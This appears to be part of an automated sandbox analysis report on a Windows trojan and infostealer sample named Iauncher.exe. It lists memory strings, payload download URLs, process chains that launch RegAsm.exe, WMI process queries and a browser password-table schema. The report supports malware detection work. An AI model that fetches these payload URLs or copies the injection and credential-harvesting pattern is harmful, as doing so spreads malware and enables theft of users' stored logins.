                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: Iauncher.exeString found in binary or memory: https://communitykeyv1.000webhostapp.com/Decoder4.php?string=
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zip
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zipd
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/516730/what-does-the-visual-studio-any-cpu-target-mean&
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/pricing.htmlFSoftware
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.44.179:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp50E6.tmpJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp50A6.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E0A0800_2_04E0A080
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E0BDD00_2_04E0BDD0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E0048C0_2_04E0048C
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E0A0700_2_04E0A070
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E023E80_2_04E023E8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E023F80_2_04E023F8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E023A00_2_04E023A0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E0B6400_2_04E0B640
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_04E0B6500_2_04E0B650
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05CBA5200_2_05CBA520
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05CBAC280_2_05CBAC28
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_0744F5310_2_0744F531
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_079277700_2_07927770
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_0792776E0_2_0792776E
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F153C40_2_09F153C4
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F154900_2_09F15490
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F1A8A10_2_09F1A8A1
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F113F00_2_09F113F0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F1344C0_2_09F1344C
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09F114000_2_09F11400
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_05CC009F0_2_05CC009F
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F1FBC02_2_00F1FBC0
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F23CF32_2_00F23CF3
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F2D4F12_2_00F2D4F1
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F2BC732_2_00F2BC73
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F1CC442_2_00F1CC44
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 2_2_00F247132_2_00F24713
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00BCDC744_2_00BCDC74
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_04D369484_2_04D36948
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_04D37C204_2_04D37C20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_04D300404_2_04D30040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_04D3003C4_2_04D3003C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_04D37C104_2_04D37C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_04D35A454_2_04D35A45
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_060467D84_2_060467D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0604A3E84_2_0604A3E8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06043F504_2_06043F50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0604A3D84_2_0604A3D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06046FE84_2_06046FE8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06046FF84_2_06046FF8
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: String function: 00F16FC0 appears 49 times
                          Source: Iauncher.exe, 00000000.00000002.3515292527.00000000051C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3508288083.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exeBinary or memory string: OriginalFilename vs Iauncher.exe
                          Source: Iauncher.exe, 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameMurkish.exe8 vs Iauncher.exe
                          Source: Iauncher.exeBinary or memory string: OriginalFilenameGitgo.exe" vs Iauncher.exe
                          Source: Iauncher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: Iauncher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Iauncher.exe.0.drStatic PE information: Section: .bsS ZLIB complexity 0.9981044138707038
                          Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@6/7@3/4
                          Source: C:\Users\user\Desktop\Iauncher.exeFile created: C:\Users\user\AppData\Roaming\Iauncher.zipJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp50A6.tmpJump to behavior
                          Source: Iauncher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Iauncher.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Users\user\Desktop\Iauncher.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002C79000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002CF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: Iauncher.exeReversingLabs: Detection: 23%
                          Source: unknownProcess created: C:\Users\user\Desktop\Iauncher.exe "C:\Users\user\Desktop\Iauncher.exe"
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess created: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iconcodecservice.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
                          Source: C:\Users\user\Desktop\Iauncher.exeAutomated click: I agree to the License terms and conditions.
